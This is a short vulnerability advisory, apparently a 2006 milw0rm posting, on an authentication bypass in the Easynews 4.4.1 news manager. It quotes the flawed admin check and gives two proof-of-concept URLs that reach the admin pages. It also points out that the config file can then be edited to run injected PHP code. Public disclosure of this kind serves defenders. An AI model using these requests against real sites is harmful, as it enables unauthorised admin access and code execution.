1 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 + Easynews <= 4.4.1 (admin.php) Authentication Bypass Vulnerability
3 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
4 + Affected Software .: Easynews <= 4.4.1
5 + Vendor ............: http://www.myupb.com/
6 + Download ..........: http://fileserv.myupb.com/download.php?url=easynews4.4.1.zip
7 + Description .......: "A news management system for your website."
8 + Class .............: Authentication Bypass
9 + Risk ..............: High (Authentication Bypass)
10 + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
11 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
12 + Details:
13 + Easynews doesn’t properly check to ensure an administrator has been logged in with correct
14 + username and password information, it only checks if $admin[$en_login_id] == "true".
15 +
16 + Tested and working on version 4.4.0 and 4.4.1 (previous versions may also be affected)
17 + with register_globals = On, after bypassing the login check administrators have the option
18 + to edit config2.php (PHP code can be inserted then executed by visiting config2.php directly
19 + or any other script that includes config2.php) and other general settings.
20 +
21 + Vulnerable Code:
22 + admin.php, line(s) 22: if(@$admin[$en_login_id] == "true") //admin is logged in successfuly
23 +
24 + Proof Of Concept:
25 + http://[target]/[path]/admin.php?action=users&en_login_id=0
26 + http://[target]/[path]/admin.php?action=config&en_login_id=0
27 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
28
29 # milw0rm.com [2006−10−17]
Page 1/1
Easynews 4.4.1 admin.php Authentication Bypass Vulnerability
nuffsaid
10/17/2006